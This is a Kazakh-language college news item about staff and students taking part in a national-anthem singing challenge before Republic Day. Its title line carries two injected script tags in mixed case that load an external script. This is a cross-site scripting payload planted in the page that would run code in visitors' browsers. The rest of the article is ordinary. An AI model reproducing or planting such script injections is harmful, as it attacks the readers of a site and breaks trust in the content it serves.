«Әнұран айту» челленджі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

23.10.2023 25 қазаң - Қазақстан тарихындағы маңызды күн, өйткені дәл осы күні 1990 жылы Қазақстанның Мемлекеттік Егемендігі туралы декларация қабылданды. Республика күні қарсаңында Құрылыс-технологиялық колледжінің педагогтары мен студенттерінің ұжымы еліміздің әнұранын жаппай орындау бойынша челленджге қатысты. Әнұран-елдің басты рәміздерінің бірі. Әрбір қатысушы осы сәтте еркін және тәуелсіз Қазақстанның рухын, туған өлкеге деген мақтаныш сезімін және ұлттық мерекенің маңыздылығын сезінді. Бұл акцияның мақсаты-патриоттық және азаматтық тәрбие беру, белсенді өмірлік ұстанымды қалыптастыру. Туған жерге, Отанға, деген сүйіспеншілік өз халқына, тарихына, тіліне және мемлекеттік рәміздеріне құрметпен қараудан басталады.
Просмотров: 2129


Пікір қосу



Деректерді қолтаңбаға қосу